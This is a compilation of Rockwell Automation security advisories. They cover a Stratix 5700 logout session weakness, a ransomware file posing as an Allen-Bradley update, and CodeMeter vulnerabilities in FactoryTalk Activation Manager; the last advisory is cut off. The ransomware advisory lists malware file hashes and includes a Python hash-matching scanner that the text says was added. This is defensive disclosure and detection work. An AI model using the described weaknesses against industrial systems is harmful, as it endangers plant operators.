Rockwell Automation’s PSIRT received a report from Amazon regarding a weakness on the Stratix 5700 switch. This weakness is a result of HTTP session management not being a feature of classic Cisco IOS. This may result in unauthenticated access to the web interface if an attacker gains access to the authenticated user’s computer after the “Logout” button has been selected. Rockwell Automation’s PSIRT has collaborated with the Cisco PSIRT to inform customers of this weakness. While this button’s function may lead the user to believe the session is being cleared, the product specifications do not advertise HTTP session management as a function. Both PSIRTs, to be transparent, see the importance of sharing this issue along with potential mitigation options.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products.

Affected Products

Allen-Bradley Stratix 5700 Industrial Managed Ethernet Switches –
  • All Cisco IOS releases (with the exception of those which incorporate the new HTTP session management feature added through Cisco BugID CSCvo20762) lack HTTP and HTTPS session management capabilities.
Details

On the Stratix 5700 Industrial Managed Ethernet switch running Cisco IOS, because no session management is performed for HTTP or HTTPS sessions, the only way to close and terminate an active HTTP or HTTPS management session is to close the web browser used for this session after the user is done. Closing the active tab or active window is not enough - the browser instance must be terminated.

If the browser instance has not been terminated, an actor with local access to the machine from which the session was established may be able to restart the management session without being prompted for any credentials, which would result in this actor having the same kind of access to the device as the user on the previous session.

Risk Mitigation & User Action

As of 26-OCT-2020, the following releases incorporate the new HTTP session management code: 15.9(3)M2, 15.9(3)M2a and 15.2(7)E3. Going forward, it is the intention of Cisco for this HTTP session management feature to be implemented in all future Cisco IOS classic releases.

If HTTP session management is desired while running a release which does not support the enhancement, Cisco IOS customers are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy.

Completing the following precautionary measure is recommended as a risk mitigation strategy against unauthenticated attackers.
  • Terminate the browser when finished – closing the tab or window is NOT enough

General Security Guidelines

Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft AppLocker or another similar whitelisting application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article ID QA17329.
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.
General Mitigations
  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715.
  • Locate control system networks and devices behind firewalls, and isolate them from the business network.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS
  • Industrial Firewalls within a CPwE Architecture
  • Deploying Industrial Firewalls within a CPwE Architecture Design and Implementation Guide

PN923 | PN923 | Claims of ransomware masquerading as an Allen-Bradley Update
Published Date:
October 02, 2020
Last Updated:
October 02, 2020
Products:
Compliance / Audit Trail / Security, 6181X Hazardous Non-Display, ProcessPak, Integration Manager, SOS, dsShopLib, RSLogix 500, Arena, Foundation Server, Shop Operations, Reporting (form based), RSView32 WebServer, Database, FactoryTalk ViewPoint, SPC, Admin Tools, RSView32 SPC, FactoryTalk VantagePoint, App Solutions Documentation, Business Objects, Migration, Studio 5000 View Designer, 650R Non-Display Computers, 750R Non-Display Computers, FactoryTalk View SE, Reporting, Interface Manager, Operator Certification, RSLogix 5, Live Transfer, 6181 Computers, 1450R Non-Display Computers, RSLogix Emulate 5000 / Studio 5000 Logix Emulate, LiveData, Agile, Installation, RSLogix Emulate 500, Knowledge Documentation, RSLogix Emulate 5, Build Utility, Shop Operation, Foundation Client, NCR/CAR/IQA, RSView32, FactoryTalk Activation, Purge, FactoryTalk Historian SE, WSIntegrate, SoftLogix5800, RSView32 Messenger, FactoryTalk Linx Gateway, Supplier Manager, RSView32 Active Display, Maintenance Releases, Connected Components Workbench, Documentation, Activities, ETL, Historical Transfer, ECO, 6180 Computers with Keypad, Production Management Client, RSLadder, RMA, Data, Thin Client, Logix Designer, Administration, 6155 Compact Computers, Production Execution Client, Installation, 6181X Hazardous Integrated Display, Dashboard, JD Edwards, ActiveX Control, FactoryTalk Metrics, TrendX, Universe Manager, FactoryTalk AssetCentre, Knowledge Installation, Sampling Plans, Configuration Tool, FactoryTalk Transaction Manager, Consumer Packaged Goods Suite, Reports (Out-of-box), PlantMetrics, API, FactoryTalk Batch, FactoryTalk EnergyMetrix, FactoryTalk View ME, SoftLogix5, Process Designer, Reports (Custom), Automotive Suite , Quality Assurance (6.x), ICAPA, RSLogix Architect / Studio 5000 Architect, Equipment Manager, PlantPAx, Complaint Handling, Pavilion, FactoryTalk Services Platform
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Introduction

Claims of ransomware masquerading as an Allen-Bradley Update

Description

Version 2.0 - July 8th 2016

Rockwell Automation has learned about the existence of a malicious file called "Allenbradleyupload.zip" that is being distributed on the internet. This file is NOT an official update from Rockwell Automation, and we have been informed that this file contains a type of ransomware malware that, if successfully installed and launched, may compromise the victim’s computer. This advisory is intended to raise awareness to control system owners and operators of reports of the file’s existence as a result of reports Rockwell Automation received from the Electricity Information Sharing and Analysis Center ("E-ISAC").

Update 08-JUL-2016: Our investigation has confirmed the existence of the reported malware through VirusTotal.com. According to VirusTotal, it "is a free service that analyzes suspicious files and URLs and facilitates the quick detection of viruses, worms, trojans, and all kinds of malware." According to information on VirusTotal.com, the file "Allenbradleyupload.zip" contains a single file called "Allenbradleyupload.exe", which may be malicious. File hashes and links to VirusTotal.com are in the table that follows below. These file hash values can be used with Application Whitelisting technologies to reduce the ability of this malware to execute on a system. According to VirusTotal, most of the antivirus/anti-malware vendors have updated their databases to detect this malware. However, we strongly recommend ensuring that your antivirus programs and virus definitions are up to date.

File Name | Hash Type | Hash Value
Allenbradleyupload.zip | MD5 | b552a95bd3eceb1770db622a08105f52
Allenbradleyupload.zip | SHA-1 | 4dbba01786068426c032a7524e31668f2435d181
Allenbradleyupload.zip | SHA-256 | e7b4a2c05e978b86a231fa276db29bb8362bd25160bdeb4c2239cb614d7f44df
Allenbradleyupload.exe | MD5 | 49067f7b3995e357c65e92d0c7d47c85
Allenbradleyupload.exe | SHA-1 | 5f8c4246fc24d400dffef63f25a44b61932b13af
Allenbradleyupload.exe | SHA-256 | 97ec86160dea82a17521a68076fe0d5537f60577b79338e67a15528115e94b88
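The advisory recommends using the hash values above with application whitelisting; the same values also let an operator check files already on a host. The scanner below is an added example, not Rockwell Automation or E-ISAC code: it hashes a blob with all three algorithms, looks every digest up in the advisory's table, and, because the table covers both the archive and the executable inside it, also hashes each member of a zip archive. `build_zip`, `MAX_MEMBER_BYTES` and the sample bytes are constructed for the demonstration.

```python
import hashlib
import io
import zipfile

# Hash values published in this advisory (Version 2.0, July 8th 2016),
# keyed by hex digest so a lookup works for any of the three algorithms.
ADVISORY_HASHES = {
    "b552a95bd3eceb1770db622a08105f52": ("Allenbradleyupload.zip", "MD5"),
    "4dbba01786068426c032a7524e31668f2435d181": ("Allenbradleyupload.zip", "SHA-1"),
    "e7b4a2c05e978b86a231fa276db29bb8362bd25160bdeb4c2239cb614d7f44df":
        ("Allenbradleyupload.zip", "SHA-256"),
    "49067f7b3995e357c65e92d0c7d47c85": ("Allenbradleyupload.exe", "MD5"),
    "5f8c4246fc24d400dffef63f25a44b61932b13af": ("Allenbradleyupload.exe", "SHA-1"),
    "97ec86160dea82a17521a68076fe0d5537f60577b79338e67a15528115e94b88":
        ("Allenbradleyupload.exe", "SHA-256"),
}

# Constructed limit: skip archive members larger than this so a crafted
# archive cannot exhaust memory while being scanned.
MAX_MEMBER_BYTES = 64 * 1024 * 1024


def digests(data):
    """MD5, SHA-1 and SHA-256 hex digests of a byte string."""
    return {
        "MD5": hashlib.md5(data).hexdigest(),
        "SHA-1": hashlib.sha1(data).hexdigest(),
        "SHA-256": hashlib.sha256(data).hexdigest(),
    }


def scan_bytes(data, label, known=ADVISORY_HASHES):
    """Match a blob, and each member if it is a zip archive, against known hashes.

    Returns a list of (label, algorithm, advisory file name) tuples: the blob's
    own matches first (MD5, SHA-1, SHA-256 order), then each archive member's.
    """
    hits = []
    for algo, hexdigest in digests(data).items():
        if hexdigest in known:
            hits.append((label, algo, known[hexdigest][0]))
    # The advisory hashes both the .zip and the .exe it contains, so look
    # inside zip containers too (recursively, for nested archives).
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            for info in archive.infolist():
                if info.is_dir() or info.file_size > MAX_MEMBER_BYTES:
                    continue
                member = archive.read(info)
                hits.extend(scan_bytes(member, label + ":" + info.filename, known))
    return hits


def scan_file(path, known=ADVISORY_HASHES):
    """Scan a file on disk; returns the same tuples as scan_bytes."""
    with open(path, "rb") as handle:
        return scan_bytes(handle.read(), path, known)


def build_zip(members):
    """Build an in-memory zip from {name: bytes}; a helper for demos and tests."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w", zipfile.ZIP_DEFLATED) as archive:
        for name, content in members.items():
            archive.writestr(name, content)
    return buffer.getvalue()


if __name__ == "__main__":
    # Constructed sample: a benign blob inside a zip. Against the advisory
    # table nothing matches; against its own SHA-256 the inner member matches.
    sample = b"constructed benign payload, not the reported malware"
    archive_bytes = build_zip({"inner.bin": sample})
    print("advisory table:", scan_bytes(archive_bytes, "outer.zip"))
    own = {digests(sample)["SHA-256"]: ("inner.bin", "SHA-256")}
    print("self-check:", scan_bytes(archive_bytes, "outer.zip", own))
```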

Rockwell Automation confirms that this malware is NOT an official product update and it is not connected with any Rockwell automation product, software update, or website.

Rockwell Automation decided to provide this advisory since the attackers have used the Rockwell Automation brand name on the file, possibly as a means to increase the likelihood of an ICS-knowledgeable user to download and execute the malware as part of their strategy. We are continuing to monitor this situation, and we will update this advisory as we learn more.

BACKGROUND

Ransomware is a class of malware that aims to extort money from the victim by restricting access to resources on the computer, and then demands a monetary ransom in order to remove the restrictions. The most common type is ransomware that will encrypt important files on an infected computer, rendering the files unusable without paying a ransom. Other types may restrict access to operating system functions or specific applications. Typically the user is required to pay the ransom in some form of untraceable currency, and must do so before the deadline expires and the decryption key is destroyed.

According to the September/October 2015 issue of the ICS-CERT Monitor, "Ransomware, such as Cryptolocker or TeslaCrypt, is currently one of the most prolific categories of malware growth, rising 165 percent in varieties seen between the fourth quarter of 2014 and the first quarter of 2015".

CUSTOMER RISK MITIGATIONS

Where feasible, precautions and risk mitigation strategies against this type of attack, like those listed below, are recommended. When possible, multiple strategies should be employed simultaneously.

  • Obtain product software and firmware from Rockwell Automation’s official download portal, available at http://www.rockwellautomation.com/global/support/drivers-software-downloads.page.
  • Follow industry best-practices to harden your PCs and Servers, including anti-virus/anti-malware and application whitelisting solutions. These recommendations are published in KB546987.
    • Consult VirusTotal.com’s analysis of the malware (using the links above), to determine if your deployed antivirus solution is able to detect this malware. (UPDATED 08-JUL-2016)
  • Analyze outbound network traffic against the known indicators of compromise (IoC), available from the US-CERT portal, to identify and assess the risk of any unusual network activity.
  • Develop, and then deploy, backup and disaster recovery policies and procedures. Test backups on a regular schedule.
  • Implement a change management system to archive network, controller and computer assets (e.g., clients, servers and applications).
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack, which can also serve as a vehicle for malware infection.
  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
  • Locate control system networks and devices behind firewalls, and isolate them from the business network.

Refer to http://www.rockwellautomation.com/rockwellautomation/products-technologies/network-technology/architectures.page? for comprehensive information about implementing validated architectures designed to deliver these measures.

We also recommend concerned customers continue to monitor this advisory, Rockwell Automation’s Security Advisory Index at https://www.rockwellautomation.com/en-us/company/about-us/sustainability/trust-security/security-advisories.html, and the company public security webpage at http://www.rockwellautomation.com/security for new and relevant information relating to this matter.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site at http://www.rockwellautomation.com/solutions/security.


KCS Status

Released

Critical
PN1530 | PN1530 | FactoryTalk Activation Manager affected by CodeMeter Vulnerabilities
Published Date:
September 18, 2020
Last Updated:
September 18, 2020
CVE IDs:
CVE-2020-14517, CVE-2020-16233, CVE-2019-14519, CVE-2020-14519, CVE-2020-14515, CVE-2020-14509, CVE-2020-14513
Products:
FactoryTalk Activation
CVSS Scores:
7.4, 8.1, 9.4, 7.5, 10.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No

Revision History
Revision Number
4.0
Revision History
Version 4.0 -- September 18, 2020. Update to reflect current mitigations. Updated links.
Version 3.0 -- September 16, 2020. Update to reflect current remediations and information from Wibu. See update below.
Version 2.1 -- September 15, 2020. Update to adjust language.
Version 2.0 -- September 14, 2020. Update regarding affected CodeMeter versions and vulnerability information.
Version 1.0 -- September 08, 2020. Initial Release.

Executive Summary

Rockwell Automation received a report from Claroty, an industrial security product vendor and research company, regarding vulnerabilities in Wibu-Systems’ CodeMeter. These vulnerabilities, if successfully exploited, may result in remote code execution, privilege escalation, or denial of service conditions to the products dependent on CodeMeter. CodeMeter is distributed as part of the installation for FactoryTalk Activation Manager. FactoryTalk Activation Manager enables customers to manage licensed content and activate Rockwell Automation software products.

Claroty has released documentation that outlines the vulnerabilities in detail. This information may make it easier for an adversary to compromise the host running Wibu CodeMeter. Customers using the affected versions of FactoryTalk Activation Manager and/or CodeMeter should implement the mitigations detailed below as soon as possible.

Affected Products

FactoryTalk Activation (FTA) Manager v4.05.00 and earlier running Wibu-Systems CodeMeter v7.10 or earlier.

The following products require FactoryTalk Activation Manager to store and keep track of Rockwell Automation software products and activation files. Any install base that includes a product from the following list therefore contains FactoryTalk Activation Manager.
  • Arena® software
  • Emonitor® software
  • FactoryTalk® AssetCentre software
  • FactoryTalk